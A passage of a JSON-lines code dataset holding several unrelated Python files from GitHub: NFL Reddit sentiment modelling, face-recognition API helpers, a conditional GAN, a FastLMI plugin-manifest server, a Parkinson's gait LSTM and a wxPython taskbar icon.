away\ndf['above_ou'] = '' # 1 for above, 0 for under\n\n# extract features from scraped text\nfor i, row in df.iterrows():\n # remove if empty\n if (((len(df['home_comments_0'][i]) == 0 and len(df['home_comments_1'][i]) == 0 and len(df['home_comments_2'][i]) == 0\n and len(df['home_comments_3'][i]) == 0 and len(df['home_comments_4'][i]) == 0 and len(df['home_comments_5'][i]) == 0\n and len(df['home_comments_6'][i]) == 0 and len(df['home_comments_7'][i]) == 0 and len(df['home_comments_8'][i]) == 0\n and len(df['home_comments_9'][i]) == 0 and len(df['home_comments_10'][i]) == 0 and len(df['home_comments_11'][i]) == 0\n and len(df['home_comments_12'][i]) == 0 and len(df['home_comments_13'][i]) == 0)\n and len(df['home_comments_14'][i]) == 0\n and len(df['home_comments_15'][i]) == 0 and len(df['home_comments_16'][i]) == 0 and len(df['home_comments_17'][i]) == 0\n and len(df['home_comments_18'][i]) == 0 and len(df['home_comments_19'][i]) == 0 and len(df['home_comments_20'][i]) == 0\n and len(df['home_comments_21'][i]) == 0 and len(df['home_comments_22'][i]) == 0 and len(df['home_comments_23'][i]) == 0\n and len(df['home_comments_24'][i]) == 0 and len(df['home_comments_25'][i]) == 0 and len(df['home_comments_26'][i]) == 0\n and len(df['home_comments_27'][i]) == 0 and len(df['home_comments_28'][i]) == 0 and len(df['home_comments_29'][i]) == 0)\n or (len(df['away_comments_0'][i]) == 0 and len(df['away_comments_1'][i]) == 0 and len(df['away_comments_2'][i]) == 0\n and len(df['away_comments_3'][i]) == 0 and len(df['away_comments_4'][i]) == 0 and len(df['away_comments_5'][i]) == 0\n and len(df['away_comments_6'][i]) == 0 and len(df['away_comments_7'][i]) == 0 and len(df['away_comments_8'][i]) == 0\n and len(df['away_comments_9'][i]) == 0 and len(df['away_comments_10'][i]) == 0 and len(df['away_comments_11'][i]) == 0\n and len(df['away_comments_12'][i]) == 0 and len(df['away_comments_13'][i]) == 0\n and len(df['away_comments_14'][i]) == 0\n and len(df['away_comments_15'][i]) == 0 and len(df['away_comments_16'][i]) == 0 and len(df['away_comments_17'][i]) == 0\n and len(df['away_comments_18'][i]) == 0 and len(df['away_comments_19'][i]) == 0 and len(df['away_comments_20'][i]) == 0\n and len(df['away_comments_21'][i]) == 0 and len(df['away_comments_22'][i]) == 0 and len(df['away_comments_23'][i]) == 0\n and len(df['away_comments_24'][i]) == 0 and len(df['away_comments_25'][i]) == 0 and len(df['away_comments_26'][i]) == 0\n and len(df['away_comments_27'][i]) == 0 and len(df['away_comments_28'][i]) == 0 and len(df['away_comments_29'][i]) == 0)):\n df = df.drop([i], axis=0)\n continue\n\n home = team_dict1[df['team_home'][i]]\n away = team_dict1[df['team_away'][i]]\n\n # determine WTS outcome\n spread = df['spread_favorite'][i]\n if df['team_favorite_id'][i] != 'PICK':\n favored = team_dict2[df['team_favorite_id'][i]]\n # calculate point spread\n if away == favored:\n spread = -1*spread # away team is favored\n game_spread = df['score_home'][i]-df['score_away'][i]\n if game_spread + spread > 0:\n df['home_wts'][i] = 1 #\n elif game_spread + spread == 0:\n df = df.drop([i], axis=0) # REMOVE PUSH\n continue\n else:\n df['home_wts'][i] = 0\n\n # determine over-under outcome\n ou = df['over_under_line'][i]\n game_ou = df['score_home'][i]+df['score_away'][i]\n if ou > game_ou:\n df['above_ou'][i] = 1\n elif game_ou == ou:\n df = df.drop([i], axis=0) # REMOVE PUSH\n continue\n else:\n df['above_ou'][i] = 0 \n \n print(i)\n\n # home team\n for delta in range(30):\n string = \"\"\n for thisdict in df['home_comments_'+str(delta)][i]:\n if thisdict[\"body\"] is None:\n continue\n string = string + thisdict[\"body\"] + \" \"\n string = preprocess(string)\n corpus.append(string)\n\n if len(string) == 0:\n vader.append([0,0,0,0])\n else:\n score = analyzer.polarity_scores(string)\n num_words = len(string.split())\n vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n afinn.append(afinn_analyzer.score(string))\n\n # away team\n for delta in range(30): \n string = \"\"\n for thisdict in df['away_comments_'+str(delta)][i]:\n if thisdict[\"body\"] is None:\n continue\n string = string + thisdict[\"body\"] + \" \"\n string = preprocess(string)\n corpus.append(string)\n if len(string) == 0:\n vader.append([0,0,0,0])\n else:\n score = analyzer.polarity_scores(string)\n num_words = len(string.split())\n vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n afinn.append(afinn_analyzer.score(string))\n \n# create bag-of-words + TF-IDF transformations\ncounts = vectorizer.fit_transform(corpus)\ntfidf = transformer.fit_transform(counts)\n\n# create feature matrices\ntemp_counts = []\ntemp_tfidf = []\ntemp_vader = []\ntemp_afinn = []\nfor i in range(int((counts.shape[0])/60)):\n temp_counts.append(np.matrix(counts[i*60:i*60+60]))\n temp_tfidf.append(np.matrix(tfidf[i*60:i*60+60]))\n temp_vader.append(np.matrix(vader[i*60:i*60+60]))\n temp_afinn.append(np.matrix(afinn[i*60:i*60+60]).T)\ncounts = temp_counts\ntfidf = temp_tfidf\nvader = temp_vader\nafinn = temp_afinn\ny = np.array(df['home_wts']).astype(str).astype(int)\ny = np.matrix(y).T\n\n# determine principal components to use (COUNTS)\npca = PCA().fit(counts)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for Counts Matrix ('+file_name+')')\nplt.show()\n\n# determine principal components to use (TFIDF)\npca = PCA().fit(tfidf)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for TFIDF Matrix ('+file_name+')')\nplt.show()\n\n# perform PCA (bag-of-words)\npca = TruncatedSVD(20)\npca.fit((sum(counts)/len(counts))[0,0])\nX_counts = []\nfor i in range(len(counts)):\n X_counts.append(np.matrix(pca.transform(counts[i][0,0])))\nX_counts = np.array(X_counts)\n\n# perform PCA (TF-IDF)\npca = TruncatedSVD(50)\npca.fit((sum(tfidf)/len(tfidf))[0,0])\nX_tfidf = []\nfor i in range(len(tfidf)):\n X_tfidf.append(np.matrix(pca.transform(tfidf[i][0,0])))\nX_tfidf = np.array(X_tfidf)\n\nX_vader = np.array(vader)\nX_afinn = np.array(afinn)\n\n\"\"\" TESTING NEURAL NETWORKS \"\"\"\nbatch_size = 5\nfor X in [X_counts, X_tfidf, X_vader, X_afinn]:\n print(X[0].shape)\n row, col = X[0].shape\n for neurons in [20, 40]:\n print(neurons, \" neurons\")\n\n # LSTM 1-layer Network\n def build_model_1():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col)))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_1, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 1: \", test_score,\"(\", test_var,\")\")\n\n # LSTM/feedforward 2-layer Network\n def build_model_2():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col)))\n model.add(Dense(neurons, activation='relu'))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_2, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 2: \", test_score,\"(\", test_var,\")\")\n\n # LSTM 2-layer Network\n def build_model_3():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col),return_sequences = True))\n model.add(LSTM(neurons))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_3, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 3: \", test_score,\"(\", test_var,\")\")\n\n # LSTM 3-layer Network\n def build_model_4():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col),return_sequences = True))\n model.add(LSTM(neurons,return_sequences = True))\n model.add(LSTM(neurons))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_4, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 4: \", test_score,\"(\", test_var,\")\")\n","repo_name":"peterxichen/nfl-reddit-sentiment","sub_path":"presentation/presentation_code.py","file_name":"presentation_code.py","file_ext":"py","file_size_in_byte":25493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"42824690824","text":"#!/usr/bin/env python\n# -=-<[ Bismillahirrahmanirrahim ]>-=-\n# -*- coding: utf-8 -*-\n# @Date : 2021-07-20 15:10:26\n# @Author : Dahir Muhammad Dahir\n# @Description : something cool\n\n\nfrom app.utils.db import list_models_and_filter_by_equality\nfrom app.dependencies.dependencies import get_recognition_auth_token\nfrom fastapi import UploadFile\nfrom app.utils.misc import requester\nfrom sqlalchemy.orm.session import Session\n\nfrom typing import Any, List\nfrom os import getenv\nimport requests\n\n\ndef remote_search_faces(face_image: UploadFile, token: str) -> requests.Response:\n face_image.file.seek(0)\n payload = {\"collection_id\": getenv(\"RECOGNITION_COLLECTION\", default=\"\"), \\\n \"threshold\": int(getenv(\"FACE_MATCH_THRESHOLD\", default=99)), \"max_faces\": int(getenv(\"MAX_FACE_MATCHES\", 1))}\n \n files = {\"image_file\": face_image.file.read()}\n \n headers = {\"Authorization\": f\"Bearer {token}\"}\n \n return requester(\n getenv(\"FACE_SEARCH_URL\", \"\"),\n method=\"post\",\n files=files,\n data=payload,\n headers=headers\n )\n\n\ndef remote_index_face(face_image_url: str, face_id: str, token: str) -> requests.Response:\n payload = {\"CollectionId\": getenv(\"RECOGNITION_COLLECTION\", default=\"\"), \\\n \"ExternalImageId\": str(face_id), \"ImagesURL\": [face_image_url]}\n \n url = getenv(\"FACE_INDEX_URL\", \"\")\n headers = {\"Authorization\": f\"Bearer {token}\"}\n\n return requester(\n url,\n method=\"post\",\n json=payload,\n headers=headers\n )\n\n\ndef remote_detect_faces(face_image: UploadFile, token: str) -> requests.Response:\n face_image.file.seek(0)\n files = {\"image_file\": face_image.file.read()}\n \n headers = {\"Authorization\": f\"Bearer {token}\"}\n \n return requester(\n getenv(\"FACE_DETECT_URL\", \"\"),\n method=\"post\",\n files=files,\n headers=headers\n )\n\n\ndef index_account_model(model_list: List[Any]):\n for model in model_list:\n face_image_url: str = model.nin_info.image\n user_id: str = model.user_id\n index_face_to_collection(face_image_url, user_id)\n\n\ndef re_index_model(db: Session, model: Any, model_name: str, count_col: str):\n db_model_record = list_models_and_filter_by_equality(\n db, \n model,\n {},\n model_name,\n count_by_column=count_col\n )\n\n count = int(db_model_record[\"count\"])\n model_list: List[Any] = db_model_record[\"result\"]\n\n if count % 100:\n rounds = (count // 100) + 1\n else:\n rounds = (count // 100)\n \n for i in range(1, rounds + 1):\n index_account_model(model_list)\n\n db_model_record = list_models_and_filter_by_equality(\n db, \n model,\n {},\n model_name,\n skip= i * 100,\n count_by_column=count_col\n )\n\n model_list = db_model_record[\"result\"]\n\n\ndef index_face_to_collection(face_image_url: str, face_id: str):\n try:\n token: str = get_recognition_auth_token()\n remote_index_face(face_image_url, face_id, token)\n except:\n pass\n\n\ndef detect_single_face(image: UploadFile, token: str):\n return remote_detect_faces(image, token).json()\n\n","repo_name":"alhytham-tech/cloud_controller","sub_path":"app/utils/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"29273649136","text":"import os\n\nimport numpy as np\nimport torch\nimport torchvision.utils as vutils\nfrom datetime import datetime\n\nfrom discriminator import Discriminator\nfrom generator import Generator\nfrom utils import to_np\n\n\nclass Model(object):\n def __init__(self, name, device, data_loader, classes, channels, img_size, latent_dim):\n self.name = name\n self.device = device\n self.data_loader = data_loader\n self.classes = classes\n self.channels = channels\n self.img_size = img_size\n self.latent_dim = latent_dim\n\n if self.name == 'cgan':\n self.netG = Generator(self.classes, self.channels, self.img_size, self.latent_dim)\n self.netG.to(device)\n\n if self.name == 'cgan':\n self.netD = Discriminator(self.classes, self.channels, self.img_size, self.latent_dim)\n self.netD.to(device)\n\n self.optim_G = None\n self.optim_D = None\n\n def create_optim(self, lr, alpha=0.5, beta=0.999):\n self.optim_G = torch.optim.Adam(filter(lambda p: p.requires_grad, self.netG.parameters()), lr=lr, betas=(alpha, beta))\n self.optim_D = torch.optim.Adam(filter(lambda p: p.requires_grad, self.netD.parameters()), lr=lr, betas=(alpha, beta))\n\n def train(self, epochs, log_interval=100, out_dir='', verbose=True):\n self.netG.train()\n self.netD.train()\n viz_noise = torch.randn(self.data_loader.batch_size, self.latent_dim, device=self.device)\n nrows = self.data_loader.batch_size // 8\n viz_label = torch.LongTensor(np.array([num for _ in range(nrows) for num in range(8)])).to(self.device)\n for epoch in range(epochs):\n for batch_idx, (data, target) in enumerate(self.data_loader):\n data, target = data.to(self.device), target.to(self.device)\n batch_size = data.size(0)\n real_label = torch.full((batch_size, 1), 1., device=self.device)\n fake_label = torch.full((batch_size, 1), 0., device=self.device)\n\n self.netG.zero_grad()\n z_noise = torch.randn(batch_size, self.latent_dim, device=self.device)\n x_fake_labels = torch.randint(0, self.classes, (batch_size,), device=self.device)\n x_fake = self.netG(z_noise, x_fake_labels)\n y_fake_g = self.netD(x_fake, x_fake_labels)\n g_loss = self.netD.loss(y_fake_g, real_label)\n g_loss.backward()\n self.optim_G.step()\n\n self.netD.zero_grad()\n y_real = self.netD(data, target)\n d_real_loss = self.netD.loss(y_real, real_label)\n\n y_fake_d = self.netD(x_fake.detach(), x_fake_labels)\n d_fake_loss = self.netD.loss(y_fake_d, fake_label)\n\n d_loss = (d_real_loss + d_fake_loss) / 2\n d_loss.backward()\n self.optim_D.step()\n\n if verbose and batch_idx % log_interval == 0 and batch_idx > 0:\n print('Epoch {} [{}/{}] loss_D: {:.4f} loss_G: {:.4f}'.format(\n epoch, batch_idx, len(self.data_loader),\n d_loss.mean().item(),\n g_loss.mean().item(),)\n )\n vutils.save_image(data, os.path.join(out_dir, 'real_samples.png'), normalize=True)\n with torch.no_grad():\n viz_sample = self.netG(viz_noise, viz_label)\n vutils.save_image(viz_sample, os.path.join(out_dir, 'fake_samples_{}.png'.format(epoch)), nrow=8, normalize=True)\n\n self.save_to(path=out_dir, name=self.name, verbose=False)\n\n def eval(self, mode=None, batch_size=None):\n self.netG.eval()\n self.netD.eval()\n if batch_size is None:\n batch_size = self.data_loader.batch_size\n nrows = batch_size // 8\n viz_labels = np.array([num for _ in range(nrows) for num in range(8)])\n viz_labels = torch.LongTensor(viz_labels).to(self.device)\n\n with torch.no_grad():\n viz_tensor = torch.randn(batch_size, self.latent_dim, 1, 1, device=self.device)\n viz_sample = self.netG(viz_tensor, viz_labels)\n\n viz_vector = to_np(viz_tensor).reshape(batch_size, self.latent_dim)\n cur_time = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n np.savetxt('vec_{}.txt'.format(cur_time), viz_vector)\n vutils.save_image(viz_sample, 'img_{}.png'.format(cur_time), nrow=8, normalize=True)\n\n def save_to(self, path='', name=None, verbose=True):\n if name is None:\n name = self.name\n\n if verbose:\n print('\\nSaving models to {}_G.pt and {}_D.pt ...'.format(name, name))\n torch.save(self.netG.state_dict(), os.path.join(path, '{}_G.pt'.format(name)))\n torch.save(self.netD.state_dict(), os.path.join(path, '{}_D.pt'.format(name)))\n\n def load_from(self, path='', name=None, verbose=True):\n if name is None:\n name = self.name\n if verbose:\n print('\\nLoading models from {}_G.pt and {}_D.pt ...'.format(name, name))\n ckpt_G = torch.load(os.path.join(path, '{}_G.pt'.format(name)))\n if isinstance(ckpt_G, dict) and 'state_dict' in ckpt_G:\n self.netG.load_state_dict(ckpt_G['state_dict'], strict=True)\n else:\n self.netG.load_state_dict(ckpt_G, strict=True)\n ckpt_D = torch.load(os.path.join(path, '{}_D.pt'.format(name)))\n if isinstance(ckpt_D, dict) and 'state_dict' in ckpt_D:\n self.netD.load_state_dict(ckpt_D['state_dict'], strict=True)\n else:\n self.netD.load_state_dict(ckpt_D, strict=True)\n\n\n\n\n\n\n","repo_name":"nkrokhmal/gans","sub_path":"cgan/build_gan.py","file_name":"build_gan.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11187272742","text":"from applogging import Log\nfrom core import AppConfig, OsExpert, NetworkExpert\nfrom pathlib import Path\nimport os\nimport logging\n\t\nclass App():\n\tdef __init__(self, appFilepath, isToNotifyStartup = True):\n\t\tprint('App start: {}'.format(appFilepath))\n\t\tfile_dirpath = OsExpert.path_backstep(appFilepath)\n\t\tparent_dirpath = OsExpert.path_backstep(file_dirpath)\n\t\tApp.initialize_in_dirs(logconfig_dirpath=file_dirpath, appconfig_dirpath=parent_dirpath)\n\t\tif isToNotifyStartup is True:\n\t\t\tNetworkExpert.tryAppNotifyByEmail(appFilepath, 'service is starting')\t\n\t@staticmethod\n\tdef initialize_in_dir(dirpath):\n\t\tApp.initialize_in_dirs(dirpath, dirpath)\n\t@staticmethod\n\tdef initialize_in_dirs(appconfig_dirpath, logconfig_dirpath):\n\t\tOsExpert.ensure_abs_dirpath_exists(appconfig_dirpath)\n\t\tOsExpert.ensure_abs_dirpath_exists(logconfig_dirpath)\n\t\tApp.initialize(\n\t\t\tappconfig_filepath = os.path.join(appconfig_dirpath, 'config.ini'), \n\t\t\tlogconfig_filepath = os.path.join(logconfig_dirpath, 'logconfig.json')\n\t\t\t)\n\t@staticmethod\n\tdef initialize(appconfig_filepath, logconfig_filepath):\n\t\tOsExpert.ensure_abs_filepath_exists(appconfig_filepath)\n\t\tLog.initialize(logconfig_filepath)\n\t\tAppConfig.initialize(appconfig_filepath) \n","repo_name":"runestate/cryptrade","sub_path":"src/python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28460015509","text":"import os\nimport stat\nfrom typing import Optional\n\nfrom fastapi import FastAPI\nfrom fastapi.encoders import jsonable_encoder\nfrom starlette.requests import Request\nfrom starlette.responses import FileResponse, JSONResponse, guess_type\n\nfrom fastlmi import ai_plugin\nfrom fastlmi.auth import LMIAuth\nfrom fastlmi.typing import PathLike\n\n\nclass FastLMI(FastAPI):\n def __init__(\n self,\n *,\n title: str,\n description: str,\n name_for_model: Optional[str] = None,\n description_for_model: Optional[str] = None,\n logo_url: Optional[str] = None,\n contact_email: str = \"\",\n legal_url: str = \"\",\n ai_plugin_manifest_url: Optional[str] = \"/.well-known/ai-plugin.json\",\n auth: Optional[LMIAuth] = None,\n **kwargs,\n ):\n \"\"\"\n :param title: Human-readable name of the application\n :param description: Human-readable description of the application\n :param name_for_model: Name the model will use to target the plugin (no spaces allowed, only letters and\n numbers)\n :param description_for_model: Description better tailored to the model, such as token context length\n considerations or keyword usage for improved plugin prompting\n :param logo_url: URL the logo image is hosted at (can be relative to root or external URL) - also\n see :meth:`serve_local_logo`\n :param contact_email: Email contact for safety/moderation, support, and deactivation\n :param legal_url: Redirect URL for users to view the application's legal information (e.g. Terms of Service)\n :param ai_plugin_manifest_url: The path to expose the AI plugin (OpenAI) manifest at\n :param auth: The authentication scheme to expose in the LMI manifest(s)\n :param kwargs: Extra options to pass to FastAPI\n \"\"\"\n self.name_for_model = name_for_model or title\n self.description_for_model = description_for_model or description\n self.contact_email = contact_email\n self.legal_url = legal_url\n self.logo_url = logo_url\n self.ai_plugin_manifest_url = ai_plugin_manifest_url\n self.auth = auth\n # pass some reasonable defaults on to FastAPI\n if legal_url:\n kwargs.setdefault(\"terms_of_service\", legal_url)\n if contact_email:\n kwargs.setdefault(\"contact\", {\"email\": contact_email})\n super().__init__(title=title, description=description, **kwargs)\n\n def setup(self) -> None:\n super().setup()\n if self.openapi_url and self.ai_plugin_manifest_url:\n self.add_route(self.ai_plugin_manifest_url, self.ai_plugin_manifest, include_in_schema=False)\n\n def ai_plugin_manifest(self, req: Request) -> JSONResponse:\n # see https://platform.openai.com/docs/plugins/getting-started/plugin-manifest\n # :///?#\n # rewrite path to root_path, then tack on the relative urls to point to the right endpoints\n components = req.url.components\n scheme = components.scheme\n netloc = components.netloc\n root_path = req.scope.get(\"root_path\", \"\")\n root_url = f\"{scheme}://{netloc}/{root_path}\".rstrip(\"/\")\n openapi_url = root_url + self.openapi_url\n if self.logo_url and self.logo_url.startswith(\"/\"):\n logo_url = root_url + self.logo_url\n else:\n logo_url = self.logo_url or \"https://public.mechanus.zhu.codes/fastlmi_logo.png\"\n ai_plugin_auth = self.auth.ai_plugin() if self.auth else ai_plugin.ManifestNoAuth()\n return JSONResponse(\n jsonable_encoder(\n ai_plugin.PluginManifest(\n schema_version=\"v1\",\n name_for_human=self.title,\n name_for_model=self.name_for_model,\n description_for_human=self.description,\n description_for_model=self.description_for_model,\n auth=ai_plugin_auth,\n api=ai_plugin.ApiSpec.openapi(openapi_url),\n logo_url=logo_url,\n contact_email=self.contact_email,\n legal_info_url=self.legal_url,\n )\n )\n )\n\n def serve_local_logo(self, path: PathLike, url: str = \"/logo\", **kwargs):\n \"\"\"\n Serve the static image file located at `path` at the route specified by `url`.\n\n Extra `**kwargs` are passed to :cls:`starlette.FileResponse`.\n \"\"\"\n self.logo_url = url\n # we can take advantage of caching by stat()ing the file; this assumes that the logo file never changes\n # if it does for some reason, pass `stat_result=None` as a kwarg to recalculate headers on each request\n if \"stat_result\" not in kwargs:\n try:\n stat_result = os.stat(path)\n except FileNotFoundError:\n raise\n else:\n mode = stat_result.st_mode\n if not stat.S_ISREG(mode):\n raise ValueError(f\"File at path {path} is not a file.\")\n kwargs[\"stat_result\"] = stat_result\n if \"media_type\" not in kwargs:\n kwargs[\"media_type\"] = guess_type(path)[0] or \"image/png\"\n\n def _local_serve(req: Request) -> FileResponse:\n # we pass the method along from the req so that it can skip reading the file body on HEAD requests\n return FileResponse(path, method=req.method, **kwargs)\n\n self.add_route(self.logo_url, _local_serve, include_in_schema=False)\n","repo_name":"zhudotexe/fastlmi","sub_path":"fastlmi/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"10436902617","text":"import torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torch.nn import functional as F\nfrom torch.utils.data import Dataset, DataLoader\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom pytorch_lightning import seed_everything, LightningModule, Trainer\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom pytorch_lightning.metrics import Precision, Recall, Accuracy\n\nfrom argparse import ArgumentParser\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# weights gewichten von labels\n# gradienten visualisieren\n# tensorboard logger\n# accuracy\n# AUC\n\nclass ParkinsonLSTM(LightningModule):\n def __init__(self, seq_len, max_batch_len, learning_rate, **kwargs):\n super().__init__()\n self.n_features = 12\n self.hidden_size = 256\n self.num_layers = 5\n self.dropout = 0.5\n self.seq_len = seq_len\n self.max_batch_size = max_batch_len\n self.criterion = torch.nn.BCELoss()\n self.learning_rate = learning_rate\n self.batch_size = int(self.max_batch_size / self.seq_len)\n \n self.output_size = 1\n self.fc_size_1 = 50\n self.fc_size_2 = 10\n\n self.lstm = nn.LSTM(input_size = self.n_features, \n hidden_size = self.hidden_size,\n num_layers = self.num_layers, \n dropout = self.dropout, \n batch_first = True)\n \n self.activation = nn.LeakyReLU() \n self.fc1 = nn.Linear(self.hidden_size, self.fc_size_1)\n self.fc2 = nn.Linear(self.fc_size_1, self.fc_size_2)\n self.fc3 = nn.Linear(self.fc_size_2, self.output_size)\n\n self.sigmoid = nn.Sigmoid()\n \n self.save_hyperparameters()\n self.accuracy = Accuracy()\n #self.roc = pl.metrics.classification.ROC(pos_label=1)\n #self.precision_metric = Precision(num_classes=2)\n #self.recall_metric = Recall(num_classes=2)\n #self.prc = pl.metrics.classification.precision_recall_curve(pos_label=1)\n \n \n def forward(self, x):\n # lstm_out = (batch_size, seq_len, hidden_size)\n pack_LSTM_out, hidden = self.lstm(x)\n #print(f\"LSTM out: {len(pack_LSTM_out)} - Hidden: {len(hidden)}\")\n #y_pred = self.linear(lstm_out[:, -1])\n \n out = hidden[0][-1, ...] # Get the output of last layer (batch_size, hidden_dim)\n\n out = self.activation(self.fc1(out))\n #out = self.dropout(out)\n out = self.activation(self.fc2(out))\n #out = F.dropout(out, training=self.training)\n out = self.fc3(out)\n\n out = self.sigmoid(out)\n #out = out.view(self.seq_len)\n \n return out\n \n \n def configure_optimizers(self):\n return torch.optim.AdamW(self.parameters(), lr=self.learning_rate)\n\n\n def training_step(self, batch, batch_idx):\n X, y = batch[0][0], batch[1][0]\n \n y_hat = self(X)\n \n loss = self.criterion(y_hat, y)\n accuracy = self.accuracy(y_hat, y)\n \n return {\"loss\": loss, \"train_accuracy\": accuracy}\n\n \n def validation_step(self, batch, batch_idx):\n X, y = batch[0][0], batch[1][0]\n \n y_hat = self(X)\n loss = self.criterion(y_hat, y)\n \n accuracy = self.accuracy(y_hat, y)\n #prec = self.precision_metric(y_hat, y)\n #rec = self.recall_metric(y_hat, y)\n\n return {\"loss\": loss, \"val_accuracy\": accuracy}#, \"val_precision\": prec, \"val_recall\": rec}\n \n \n def test_step(self, batch, batch_idx):\n X, y = batch[0][0], batch[1][0]\n \n y_hat = self(X)\n loss = self.criterion(y_hat, y)\n \n return loss\n \n \n def training_epoch_end(self, train_step_outputs):\n losses = []\n accuracies = []\n \n for i in range(len(train_step_outputs)):\n losses.append(float(np.array(train_step_outputs[i][\"loss\"])))\n accuracies.append(float(np.array(train_step_outputs[i][\"train_accuracy\"]))) \n \n self.log('train_loss', np.mean(losses))\n self.log('train_accuracy', np.mean(accuracies))\n \n \n def validation_epoch_end(self, val_step_outputs):\n losses = []\n accuracies = []\n #precisions = []\n #recalls = []\n \n for i in range(len(val_step_outputs)):\n losses.append(float(np.array(val_step_outputs[i][\"loss\"])))\n accuracies.append(float(np.array(val_step_outputs[i][\"val_accuracy\"]))) \n #precisions.append(float(np.array(val_step_outputs[i][\"val_precision\"]))) \n #recalls.append(float(np.array(val_step_outputs[i][\"val_recall\"]))) \n \n self.log('val_loss', np.mean(losses))\n self.log('val_accuracy', np.mean(accuracies))\n #self.log('val_recall', np.mean(recalls))\n #self.log('val_precision', np.mean(precisions))\n \n \n def test_epoch_end(self, test_step_outputs):\n losses = []\n for loss in test_step_outputs:\n losses.append(float(np.array(loss)))\n \n self.log('test_loss', np.mean(losses))\n \n \n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument('--seq_len', type=int, default=256)\n parser.add_argument('--max_batch_len', type=int, default=6400)\n parser.add_argument('--learning_rate', type=float, default=0.001)\n parser.add_argument('--epochs', type=int, default=5)\n return parser\n ","repo_name":"Mavengence/Representation-Learning-for-Gait-Analysis-in-Parkinson-s-Patients","sub_path":"models/lstm/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"22330624737","text":"import wx\r\n\r\nclass TaskBarIcon(wx.TaskBarIcon):\r\n id_about = wx.NewId()\r\n id_minshow = wx.NewId()\r\n id_maxshow = wx.NewId()\r\n id_closeshow = wx.NewId()\r\n \r\n def __init__(self, frame):\r\n wx.TaskBarIcon.__init__(self)\r\n self.frame = frame\r\n \r\n self.SetIcon(wx.Icon(name=\"secure.ico\", type=wx.BITMAP_TYPE_ICO), \"System demo\")\r\n \r\n self.Bind(wx.EVT_MENU, self.OnAbout, id=self.id_about)\r\n self.Bind(wx.EVT_MENU, self.OnMinShow, id=self.id_minshow)\r\n self.Bind(wx.EVT_MENU, self.OnMaxShow, id=self.id_maxshow)\r\n self.Bind(wx.EVT_MENU, self.OnCloseShow, id=self.id_closeshow)\r\n \r\n self.Bind(wx.EVT_TASKBAR_LEFT_DCLICK, self.OnTaskBarLeftDClick)\r\n \r\n def OnTaskBarLeftDClick(self,event):\r\n if self.frame.IsIconized() : \r\n self.frame.Iconize(False)\r\n if not self.frame.IsShown():\r\n self.frame.Show(True)\r\n \r\n self.frame.Raise()\r\n \r\n def OnAbout(self, event):\r\n wx.MessageBox(\"This is a wxpython demo .\",\"About\")\r\n \r\n def OnMinShow(self, event):\r\n self.frame.Iconize()\r\n \r\n def OnMaxShow(self, event):\r\n self.OnTaskBarLeftDClick()\r\n self.frame.Maximize(True)\r\n \r\n def OnCloseShow(self,event):\r\n self.frame.Close(True)\r\n \r\n def CreatePopupMenu(self):\r\n menu = wx.Menu()\r\n menu.Append(self.id_minshow, \"Mini\")\r\n menu.Append(self.id_maxshow, \"Max\")\r\n menu.Append(self.id_about, \"About\")\r\n menu.Append(self.id_closeshow, \"Close\")\r\n \r\n return menu\r\n \r\n\r\nclass MyFrame(wx.Frame):\r\n def __init__(self, 